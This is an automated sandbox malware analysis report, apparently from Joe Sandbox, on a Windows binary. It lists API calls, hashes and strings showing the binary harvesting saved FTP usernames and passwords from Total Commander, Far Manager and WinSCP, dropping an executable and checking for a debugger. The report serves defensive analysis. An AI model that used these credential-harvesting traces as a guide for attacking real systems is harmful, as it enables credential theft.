                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$AttemptConnectOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2984283330-0
                                                                                                                                                                                                                • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                                • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfileString$AllocHeap
                                                                                                                                                                                                                • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                                                                                                                                                                                                                • API String ID: 2479592106-2015850556
                                                                                                                                                                                                                • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                                                                                                                                                                                                                  • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 004032E5
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 004032ED
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
• String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
• API String ID: 3066332896-2664446222
• Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
• Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
• Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
• Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
• FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
• PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
• Sleep.KERNEL32(00000000), ref: 00408342
• Sleep.KERNEL32(00000000), ref: 00408377
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
• FindClose.KERNEL32(00000000), ref: 004083B9
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
• String ID: .$.$.8@$.8@$@@
• API String ID: 2348139788-3828113974
• Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
• Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
• Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
• Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
• HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
• HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
• GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
Strings
Similarity
• API ID: PrivateProfile$String$AllocHeap$CombinePath
• String ID: ftp://%s:%s@%s:%u$pass$port$user
• API String ID: 3432043379-2696999094
• Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
• Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
• Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
• Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
APIs
• IsDebuggerPresent.KERNEL32 ref: 0040D0C4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
• UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
• GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
• TerminateProcess.KERNEL32(00000000), ref: 0040D107
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
• Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
• Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
• Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
APIs
  • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
• GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
• GetLastError.KERNEL32(?), ref: 00402F4E
• GetLastError.KERNEL32 ref: 00403237
• GetLastError.KERNEL32(?), ref: 00403258
Strings
Similarity
• API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
• String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
• API String ID: 2247176544-2288798624
• Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
• Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
• Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
• Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
APIs
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
• InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
• GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
• CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
Strings
Similarity
• API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
• String ID: \netprotdrvss.exe$begun.ru
• API String ID: 2887986221-2660752650
• Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
• Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
• Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
• Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
APIs
  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                                • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                                • API String ID: 2046068145-3914982127
                                                                                                                                                                                                                • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                                • String ID: From: true
                                                                                                                                                                                                                • API String ID: 1176259655-9585188
                                                                                                                                                                                                                • Opcode ID: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                                • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                                • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                                • API String ID: 416369273-4007225339
                                                                                                                                                                                                                • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                                • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                                • API String ID: 3497950970-285550827
                                                                                                                                                                                                                • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: String$Free$Alloc$CharLower
• String ID: http:$javascript$+@
• API String ID: 1987340527-3375436608
• Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
• Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
• Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
• Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Sleep
• String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
• API String ID: 3472027048-1081452883
• Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
• Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
• Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
• Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
APIs
• DeleteFileW.KERNEL32(00000000,76230F00), ref: 00407043
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
• GetLastError.KERNEL32(00000000), ref: 00407079
• SetEndOfFile.KERNEL32(00000000), ref: 0040708F
• InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
• CloseHandle.KERNEL32(00000000), ref: 004070BB
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
• String ID:
• API String ID: 3711279109-0
• Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
• Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
• Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
• Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
APIs
• VariantClear.OLEAUT32(00000016), ref: 00408E7A
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: ClearVariant
• String ID: _self$http$+@
• API String ID: 1473721057-3317424838
• Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
• Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
• Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
• Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
APIs
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
